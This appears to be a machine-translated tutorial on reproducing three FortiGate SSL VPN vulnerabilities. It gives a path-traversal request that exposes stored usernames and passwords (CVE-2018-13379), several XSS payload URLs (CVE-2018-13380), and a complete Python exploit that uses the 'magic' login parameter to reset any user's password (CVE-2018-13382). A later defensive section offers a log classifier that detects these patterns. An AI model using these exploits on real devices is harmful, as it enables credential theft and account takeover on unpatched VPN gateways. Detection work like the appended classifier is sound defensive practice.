2025-02-25 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article shows how to reproduce the Fortigate SSL VPN vulnerabilities. The content is detailed; interested readers can use it as a reference, and I hope it is helpful to you.
Fortigate
FortiGate is the name of Fortinet's firewall appliances: Fortinet is the brand, and FortiGate refers to its hardware. Fortinet's award-winning FortiGate series is an ASIC-accelerated UTM solution that effectively protects against attacks at the network and content layers. FortiGate solutions can detect and eliminate multiple layers of attacks, such as viruses, worms, intrusions, and real-time application threats such as malicious Web content, without degrading network performance. It provides a comprehensive security architecture that covers anti-virus, anti-spam, firewall, VPN, intrusion detection and prevention, and traffic optimization. In addition to FortiGate, Fortinet also provides email security solutions such as FortiMail, and FortiClient for endpoint and smartphone security.
CVE-2018-13379 pre-auth arbitrary file read vulnerability: brief introduction
Fortinet FortiOS path traversal vulnerabilities (CNNVD-201905-1026, CVE-2018-13379)
The vulnerability stems from the system's failure to properly filter special elements in the resource or file path, which can be exploited by an attacker to access locations outside the restricted directory. SSL VPN in Fortinet FortiOS versions 5.6.3 to 5.6.7 and 6.0.0 to 6.0.4 is affected by this vulnerability.
Vulnerability impact
SSL VPN in Fortinet FortiOS versions 5.6.3 to 5.6.7 and Fortinet FortiOS 6.0.0 to 6.0.4 is affected by this vulnerability.
Reproduction process
Request the following path to check whether the vulnerability is present:
/remote/fgt_lang?lang=/../dev/cmdb/sslvpn_websession
The response shows the user name and password.
With them, you can log in successfully.
Testing tool: https://github.com/ianxtianxt/CVE-2018-13379
CVE-2018-13380 Fortinet FortiOS XSS vulnerability: brief introduction
Fortinet FortiOS is a security operating system from the American company Fortinet, designed specifically for the FortiGate network security platform. The system provides users with a variety of security functions, such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. There is a cross-site scripting vulnerability in the Fortinet FortiOS portals in versions 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and earlier. The vulnerability is caused by the web application's lack of proper validation of client data. An attacker can exploit this vulnerability to execute client-side code.
Vulnerability impact
Fortinet FortiOS 6.2, Fortinet FortiOS 6.0.5, Fortinet FortiOS 5.6.8
Reproduction process
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
/remote/loginredir?redir=6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29
/message?title=x&msg=%26%23
CVE-2018-13382 Fortinet FortiOS magic backdoor vulnerability: brief introduction
Fortinet FortiOS is a security operating system from the American company Fortinet, designed specifically for the FortiGate network security platform. The system provides users with a variety of security functions, such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. The SSL VPN Web portals in Fortinet FortiOS versions 6.0.0 to 6.0.4, 5.6.0 to 5.6.8, and 5.4.1 to 5.4.10 are affected by an authorization issue vulnerability. The vulnerability is caused by missing authentication measures or insufficient authentication strength in the network system or product.
Vulnerability impact
Fortinet FortiOS 6.2, Fortinet FortiOS 6.0.5, Fortinet FortiOS 5.6.9, Fortinet FortiOS 5.4.11
Reproduction process
The login page accepts a special parameter, magic; once this parameter is set to a special string, any user's password can be changed.
The password can be changed directly with the PoC:
import requests, optparse, sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from user_agent import generate_user_agent

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

bold = True
userAgent = generate_user_agent()
username = ""
newpassword = ""
ip = ""


def setColor(message, bold=False, color=None, onColor=None):
    """Wrap a status string in terminal colour codes."""
    from termcolor import colored
    retVal = colored(message, color=color, on_color=onColor, attrs=["bold"])
    return retVal


def checkIP(ip):
    """Return True if the host serves the FortiGate SSL VPN login page."""
    try:
        url = "https://" + ip + "/remote/login?lang=en"
        headers = {"User-Agent": userAgent,
                   "Accept": "text/html,application/xhtml+xml,application/xml",
                   "Accept-Language": "en-US,en;q=0.5",
                   "Accept-Encoding": "gzip, deflate",
                   "Connection": "close",
                   "Upgrade-Insecure-Requests": "1"}
        r = requests.get(url, headers=headers, verify=False)
        if r.status_code == 200 and "Please Login" in r.text:
            return True
        else:
            return False
    except requests.exceptions.ConnectionError as e:
        print(e)
        return False


def changePassword(ip, username, newpassword):
    """Send the logincheck request that carries the magic parameter."""
    url = "https://" + ip + "/remote/logincheck"
    headers = {"User-Agent": userAgent,
               "Accept": "*/*",
               "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "Referer": "https://" + ip + "/remote/login?lang=en",
               "Pragma": "no-cache",
               "Cache-Control": "no-store, no-cache, must-revalidate",
               "If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT",
               "Content-Type": "text/plain;charset=UTF-8",
               "Connection": "close"}
    data = {"ajax": "1", "username": username, "realm": "",
            "credential": newpassword, "magic": "4tinet2095866",
            "reqid": "0", "credential2": newpassword}
    r = requests.post(url, headers=headers, data=data, verify=False)
    if r.status_code == 200 and "redir=/remote/hostcheck_install" in r.text:
        return True
    else:
        return False


def testLogin(ip, username, newpassword):
    """Log in with the new password to confirm that the change took effect."""
    url = "https://" + ip + "/remote/logincheck"
    headers = {"User-Agent": userAgent,
               "Accept": "*/*",
               "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "Referer": "https://" + ip + "/remote/login?lang=en",
               "Pragma": "no-cache",
               "Cache-Control": "no-store, no-cache, must-revalidate",
               "If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT",
               "Content-Type": "text/plain;charset=UTF-8",
               "Connection": "close"}
    data = {"ajax": "1", "username": username, "realm": "",
            "credential": newpassword}
    r = requests.post(url, headers=headers, data=data, verify=False)
    if r.status_code == 200 and "redir=/remote/hostcheck_install" in r.text:
        return True
    else:
        return False


parser = optparse.OptionParser()
parser.add_option('-i', action="store", dest="ip", help="e.g. 127.0.0.1:10443")
parser.add_option('-u', action="store", dest="username")
parser.add_option('-p', action="store", dest="password")
options, remainder = parser.parse_args()
if not options.username or not options.password or not options.ip:
    print("[!] Please provide the ip (-i), username (-u) and password (-p)")
    sys.exit()
if options.username:
    username = options.username
if options.password:
    newpassword = options.password
if options.ip:
    ip = options.ip

tmpStatus = checkIP(ip)
if tmpStatus == True:
    print("[*] Checking if target is a Fortigate device " + setColor("[OK]", bold, color="green"))
    if changePassword(ip, username, newpassword) == True:
        print("[*] Using the magic keyword to change password for: [" + username + "] " + setColor("[OK]", bold, color="green"))
        if testLogin(ip, username, newpassword) == True:
            print("[*] Testing new credentials [" + username + "|" + newpassword + "] " + setColor("[OK]", bold, color="green"))
            print("* Enjoy your new credentials *")
        else:
            print("[*] Testing new credentials [" + username + "|" + newpassword + "] " + setColor("[NOK]", bold, color="red"))
    else:
        print("[*] Using the magic keyword to change password for: [" + username + "] " + setColor("[NOK]", bold, color="red"))
else:
    print("[*] Checking if target is a Fortigate device " + setColor("[NOK]", bold, color="red"))

That is all for this walkthrough of reproducing the Fortigate SSL VPN vulnerabilities. I hope the above content is of some help to you and that you learn something from it. If you think the article is good, you can share it for more people to see.
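A defender-side check for the three request patterns described in this article, as an added example (not part of the original article or of any Fortinet tooling): it classifies request records from a reverse proxy or WAF log by the CVE they match. The record layout, the function names and the sample records are constructed for illustration, and treating any non-empty magic field in a login POST as worth review is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample records (method, request target, body); not real traffic.
SAMPLE = [
    ("GET", "/remote/login?lang=en", ""),
    ("GET", "/remote/fgt_lang?lang=/../dev/cmdb/sslvpn_websession", ""),
    ("GET", "/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E", ""),
    ("GET", "/remote/loginredir?redir="
            "6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29", ""),
    ("POST", "/remote/logincheck", "ajax=1&username=u&realm=&credential=x"),
    ("POST", "/remote/logincheck", "ajax=1&username=u&magic=CONSTRUCTED&credential2=x"),
]
MARKUP = re.compile(r"<\s*script|-->|&#|javascript:", re.I)
REFLECTED = {"/remote/error": "errmsg", "/message": "msg"}  # path -> echoed parameter

def hex_decoded(value):
    """Text that a hex-encoded parameter decodes to, or '' if it is not hex."""
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return ""

def classify(method, target, body=""):
    """Return the set of CVE ids whose request pattern this record matches."""
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    hits = set()
    # CVE-2018-13379: directory traversal in the lang parameter of fgt_lang
    if parts.path == "/remote/fgt_lang" and ".." in query.get("lang", ""):
        hits.add("CVE-2018-13379")
    # CVE-2018-13380: markup in an echoed parameter, or a hex-encoded script URL
    param = REFLECTED.get(parts.path)
    if param and MARKUP.search(query.get(param, "")):
        hits.add("CVE-2018-13380")
    redir = query.get("redir", "") if parts.path == "/remote/loginredir" else ""
    if MARKUP.search(redir) or MARKUP.search(hex_decoded(redir)):
        hits.add("CVE-2018-13380")
    # CVE-2018-13382: login POST carrying a non-empty magic field (review it)
    if method == "POST" and parts.path == "/remote/logincheck" and parse_qs(body).get("magic"):
        hits.add("CVE-2018-13382")
    return hits

def scan(records):
    results = [(m, t, sorted(classify(m, t, b))) for m, t, b in records]
    return [r for r in results if r[2]]

if __name__ == "__main__":
    for method, target, cves in scan(SAMPLE):
        print(method, target, cves)
```

The login POST body is only available where the proxy or WAF records request bodies; plain access logs cover the two URL-based patterns.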